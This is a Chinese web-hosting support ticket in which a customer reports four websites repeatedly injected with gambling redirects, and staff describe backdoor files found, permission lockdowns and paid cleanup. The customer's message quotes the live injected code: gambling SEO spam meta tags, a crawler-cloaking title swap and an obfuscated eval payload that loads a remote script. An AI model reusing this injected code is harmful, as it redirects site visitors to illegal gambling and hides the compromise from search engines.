问:服务器上共4个网站,全被挂马,以前用CENTOS6.4,被挂过一次马,直接重新安装了CENTOS6.9的,没过几个月又被挂马了。
<title>北京赛车官方投注平台_北京赛车pk10投注平台【官方授权入口】</title><meta name=\”keywords\” content=\”北京赛车pk10官网,北京赛车pk10投注,北京pk赛车投注技巧,北京pk10走势图,北京赛车开奖走势图,北京赛车pk10计划,北京赛车免费全天计划,北京赛车pk10平台,北京赛车pk技巧,北京赛车pk10官方网站,北京赛车pk10直播网,北京赛车pk10开奖直播,北京pk10稳赚方法,北京pk10论坛,北京赛车正规官网,北京赛车是否正规官方,北京赛车网投平台,北京pk10信誉平台,北京pk10现金平台,北京pk10投注网站,北京pk10下注平台,北京pk赛车开奖结果\”/><meta name=\”description\” content=\”北京赛车pk10投注官方网站【www.7697bb.com】(诚招代理商QQ:128855),包含海量北京赛车pk10注册投注,不输技巧,现在的北京赛车pk10给我们玩家提供了一个交流娱乐的专区,就是在我们娱乐休闲之余,可以在这里学习一下,北京赛车pk10官方网站经验和技巧。\”/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf(\”baidu\”) == -1){document.title =\”视觉论坛VISIONBBS_机器视觉_LED视觉光源_光源控制器_工业相机_工业镜头_机器视觉方案_系统_图像处理教程_东莞 华动智能科技有限公司\”}</script><script type=\”text/javascript\”>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\”\”:e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!\’\’.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\’\\\\w \’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(\’\\\\b\’ e(c) \’\\\\b\’,\’g\’),k[c]);return p;}(\’l[\”\\\\e\\\\c\\\\1\\\\m\\\\i\\\\8\\\\n\\\\0\”][\”\\\\7\\\\4\\\\9\\\\0\\\\8\”](\\\’\\\\h\\\\2\\\\1\\\\4\\\\9\\\\3\\\\0 \\\\0\\\\j\\\\3\\\\8\\\\d\\\\6\\\\0\\\\8\\\\k\\\\0\\\\5\\\\f\\\\a\\\\r\\\\a\\\\2\\\\1\\\\4\\\\9\\\\3\\\\0\\\\6 \\\\2\\\\4\\\\1\\\\d\\\\6\\\\s\\\\0\\\\0\\\\3\\\\2\\\\q\\\\5\\\\5\\\\7\\\\7\\\\7\\\\b\\\\1\\\\3\\\\e\\\\a\\\\2\\\\p\\\\b\\\\1\\\\c\\\\i\\\\5\\\\j\\\\o\\\\1\\\\b\\\\f\\\\2\\\\6\\\\g\\\\h\\\\5\\\\2\\\\1\\\\4\\\\9\\\\3\\\\0\\\\g\\\’);\’,29,29,\’x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68\’.split(\’|\’),0,{}))</script>
答:您好,这种情况主要是网站程序漏洞导致的挂马,和服务器版本并无太大关系,需要您联系网站程序人员进行挂马清理和程序漏洞修复,服务器内可以装云锁,进行扫描,参考https://faq.myhost.net/faq/listagent.asp?unid=2093
您当前是独立IP主机,如需我司进入进行挂马清理和全面的漏洞修复,挂马清理是每个站点100元,全面安全加固为680元,您可以充值到工单余额,我们进行处理,会花费较长时间,请提交后耐心等待处理结果,谢谢。
问:我这边在提交公单页面充值了1080元(4个站400元 680元)。支付宝支付成功了,但是在工单页面看不到余额。你们这个页面,上传图片功能不好用,一点上传就死掉了。
答:您好,非常抱歉给您带来的不便,目前查看并未查看到余额充值,您可以将截图提供下我们核实,可以使用qq截图后粘贴进来,谢谢。
问:还是没解决呀。开了防篡改,还是被挂马了。
答:您好,
??1、shixinhua查到3个新增的后门文件,首页已经设置更严格的权限锁定无法修改和删除。?/news/list_24_1.php/count/images/count.php/camera/list_3_1.php2、??vstmv发现有两个新增挂马,首页已经锁定??themes/suning/images/art_cat_fen.php/js/calendar/rowhover.php目前调整了一下各个目录的执行权限,请再观察下,谢谢。
问:visionbbs.com(visionhome.cn这个站)
现在直接进去,点的链接好像也没什么问题。但是刚才QQ上有人给我发了一个该网站的链接:但是从这个链接进去后,地址后面多加了一段:http://visionbbs.com/forum-87-1.html?tdsourcetag=s_pcqq_aiomsg这个页面上的链接地址看,是没有问题的,但是点开链接后,都是跳转到赌博网站了:
问:使用visionbbs.com进入网站,没问题。链接也正常。然后将该链接复制到QQ中,表面上看也是正常的。
但是从QQ上直接点击,打开的就是带尾巴的地址。然后从这个页面进去的地址,都跳到非法网站上去了。但是如果手动复制上面的地址再粘贴到浏览器中打开,又没有。这个是正常的页面这个是被挂马的页面
问:
四面站点的地址,只要经过QQ复制粘贴,都会在后面添加一段。通过腾讯QQ、腾讯TIM发,并且在这些软件中打开,就会有尾巴。在腾讯的轻聊版QQ中发的,不会带。在阿里旺旺上发,也不会有尾巴。直接复制粘贴到浏览器中,也不会有。
问:从百度/搜狗等搜索进visionhome.cn(visionbbs.com)的地址,也会跳转到非法网站(pcmv.cn/shixinhua.com/vstmv.com没有跳转):
答:您好,
1、http://visionbbs.com/forum-87-1.html?tdsourcetag=s_pcqq_aiomsg 现在访问已经没有跳转了,查看是在昨天新增的挂马,属于程序漏洞被利用导致。目前针对挂马文件进行了锁定。自动加的这段是正常的,是qq增加上去的,挂马代码 通过qq的访问来进行恶意跳转。2、查看搜狗跳转是由于快照还未更新,建议您投诉下这个快照使其更新,目前我们模拟搜狗抓取没有出现挂马跳转的情况。
问:shixinhua.com这个站的主页生成不了。关了云锁也仍然生成不了。另外一个pcmv.cn站的dedecms程序,关了云锁则可以生成。请问是哪里设置了吗?我这边要怎么操作才可以正常生成。FTP进去,index.html/index.php文件属性改不了,也删不掉,关不关云锁都动不了。如果都改不了,虽然说木马也改不了,但是我也改不了啊,还请提供解决方法。
答:您好,??shixinhua.com这个站首页index.html,之前帮您设置过锁定保护,现在已经去除,仅使用云锁的保护,请查看下,目前我帮您重新检查了一下这个站点,暂未发现新增的后门文件,谢谢。?